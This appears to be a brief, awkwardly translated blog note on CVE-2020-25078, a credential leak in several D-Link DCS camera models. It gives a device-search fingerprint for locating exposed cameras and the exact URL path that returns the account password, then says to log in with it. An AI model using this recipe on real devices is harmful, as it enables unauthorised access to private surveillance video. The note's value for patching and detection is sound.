D Link Dcs Series Monitoring Account Password Information Leakage Vulnerability Cve 2020 25078
D Link Dcs Series Monitoring Account Password Information Leakage Vulnerability Cve 2020 25078
D-Link DCS series monitoring account password information leakage vulnerability CVE-2020-25078
Vulnerability Description
D-Link DCS series monitoring by accessing specific URLs to obtain account password information. Attackers can access the background through vulnerabilities and obtain video surveillance pages.
Vulnerability Impact
DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703
Network surveying and mapping
app=”D_Link-DCS-2530L”
Vulnerability reappears
Visit the login page as follows
The Url with a vulnerability is, which leaked the account password
https://xxx.xxx.xxx.xxx/config/getuser?index=0
Log in to the system with leaked account password
This post is licensed under CC BY 4.0 by the author.